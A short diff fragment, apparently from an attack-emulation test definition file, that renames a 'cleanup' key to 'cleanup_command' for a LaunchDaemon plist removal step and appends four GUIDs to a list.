-    cleanup: |
+    cleanup_command: |
      sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
      sudo rm /Library/LaunchDaemons/#{plist_filename}

@@ -728,3 +728,7 @@ b4988cad-6ed2-434d-ace5-ea2670782129
 649349c7-9abf-493b-a7a2-b1aa4d141528
 a8aa2d3e-1c52-4016-bc73-0f8854cfa80a
 c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
+5a51ef57-299e-4d62-8e11-2d440df55e69
+b8e747c3-bdf7-4d71-bce2-f1df2a057406
+a12b5531-acab-4618-a470-0dafb294a87a
+d400090a-d8ca-4be0-982e-c70598a23de9